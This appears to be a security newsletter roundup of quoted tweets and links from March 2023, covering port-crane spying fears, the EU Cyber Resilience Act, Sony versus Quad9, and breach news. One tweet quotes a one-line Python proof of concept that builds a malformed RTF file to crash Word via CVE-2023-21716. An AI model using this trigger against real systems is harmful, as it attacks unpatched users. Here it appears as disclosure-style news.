March 6, 2023

                March 6, 2023

            March 6, 2023

Pinboard @Pinboard
Chilling. There's a risk that China could be using cranes to spy on US manufactured goods as they arrive in the US from China 
*Walter Bloomberg @DeItaoneWASHINGTON—U.S. officials are growing concerned that giant Chinese-made cranes operating at American ports across the country, including at several used by the military, could give Beijing a possible spying tool hiding in plain sight.     
https://t.co/b0O53Wwptt4:28 PM ∙ Mar 5, 2023
70Likes7Retweets
-
The Info Op is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.

-
Aaron Bateman @aaronbateman22
National Military Command Center (c. 1975) 
2:35 PM ∙ Mar 5, 2023
74Likes9Retweets
-
Matthew Green @matthew_d_green
We reached the point in my blockchains class where the students asked “what happens if you make a mistake in your smart contract code” and oh it was glorious.2:02 PM ∙ Mar 1, 2023
881Likes55Retweets
-
Porn Zoom bomb forces cancellation of Fed's Waller event
Meeting of dicks canceled for excessive dicks.

https://www.reuters.com/world/us/feds-waller-virtual-event-canceled-after-zoom-hijack-2023-03-02/
-
Japan self defense force trains for terrorist attacks (by YouTubers)
It’s not clear if the training scenario was constructed under the theory that terrorists might pose as YouTubers while trying to approach their targets  

            Japanese Self-Defense Forces and Tokyo police hold anti-nuisance YouTuber drill【Video】 | SoraNews24 -Japan News-
            ”It was just a prank, bro!” won’t get intruders off with just a warning.

-
@mikko @mikko
Sony Music was known as the company that was putting rootkits on their music CDs. Now they are litigating against DNS provider Quad9, requiring them to block a website that links to a site containing files that Sony asserts are violating their copyright. quad9.netSony’s Legal Attack on Quad9, Censorship, and Freedom of Speech | Quad9A potentially precedent-setting legal case involving Sony Music and Quad9 may endanger internet freedom of speech and allow unchecked content censorship.12:40 PM ∙ Mar 5, 2023
141Likes53Retweets
-
FCCE @the_FCCE
No doubt it will hurt European innovation & competitiveness, especially when it comes to SMEs.
It also risks hurt open source development in the EU, so there might be another ship we might watch sailing off in the distance while wondering why the Eu has such a hard time competing 
Bert Hubert 🇺🇦 @bert_hu_bert
Updated after reader feedback: The EU's new Cyber Resilience Act is about to tell us how to code, and fine us hugely if we don't https://t.co/d7G00gNJYK10:28 AM ∙ Mar 6, 2023
4Likes5Retweets
Bert Hubert 🇺🇦 @bert_hu_bert
Updated after reader feedback: The EU's new Cyber Resilience Act is about to tell us how to code, and fine us hugely if we don't berthub.euThe EU’s new Cyber Resilience Act is about to tell us how to code - Bert Hubert’s writingsFirst a round of thanks for the many people in industry and government who provided valuable links, background and insights! I could not have done this without your help! If you spot any mistakes, or have suggestions, please do contact me on bert@hubertnet.nl
The EU’s new Cyber Resilience Act is adm…9:05 AM ∙ Mar 6, 2023
21Likes12Retweets
-
badidea 🪐 @0xabad1dea
so glad to be living in the future where AI keeps breaking out of every moral constraint we try due to the Waluigi Effect lesswrong.comThe Waluigi Effect (mega-post) - LessWrongEveryone carries a shadow, and the less it is embodied in the individual’s conscious life, the blacker and denser it is. — Carl Jung …8:47 AM ∙ Mar 6, 2023
44Likes15Retweets
-
Josh Trebach, MD @jtrebach
one time I was in the hospital elevator with a resident and then the elevator got stuck and I was like “omg we are going to die” and she was like “omg YES I needed this today” and sat down and started eating a granola bar1:33 AM ∙ Mar 5, 2023
162,299Likes8,791Retweets
-
Ollie Whitehouse @ollieatnowhere
A couple of weeks ago Hannah, @AlexBorshik and I implemented an extension for Burp Suite Enterprise Edition to support TOTP MFA.

I then learnt a friend keeps all he is TOTP seeds in Git. I am not sure that was ever the envisaged security model 😅
Code 👇
github.com/Hannah-PortSwi…
github.comGitHub - Hannah-PortSwigger/TOTPAuthenticate: This extension, for Burp Suite Enterprise Edition, utilizes session handling rules to provide…This extension, for Burp Suite Enterprise Edition, utilizes session handling rules to provide a TOTP token to outgoing requests. - GitHub - Hannah-PortSwigger/TOTPAuthenticate: This extension, for ...
7:23 AM ∙ Mar 6, 2023
9Likes6Retweets-
Tom Wong @thomasgwong
Recently, some media outlets reported that one of the post-quantum cryptography algorithms that NIST selected for standardization had been broken. That's not the case. An implementation of the algorithm was cracked, not the algorithm itself. insidequantumtechnology.comMoody: Researchers didn’t break Crystals-Kyber algorithm; standards course unchanged - Inside Quantum Technology4:17 PM ∙ Feb 28, 2023
39Likes18Retweets
-
Jessica Elgot @jessicaelgot
Every meeting ever 
12:45 PM ∙ Mar 5, 2023
9,188Likes1,104Retweets
-
Joshua J. Drake @jduck
CVE-2023-21716 Python PoC (take 2) open("t3zt.rtf","wb").write(("{\rtf1{\n{\fonttbl" + "".join([ ("{\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\rtlch no crash??}\n}}\n").encode('utf-8'))8:02 PM ∙ Mar 5, 2023
321Likes90Retweets
-
Hackers Claim They Breached T-Mobile More Than 100 Times in 2022

https://krebsonsecurity.com/2023/02/hackers-claim-they-breached-t-mobile-more-than-100-times-in-2022/
-

Don't miss what's next. Subscribe to the grugq's newsletter: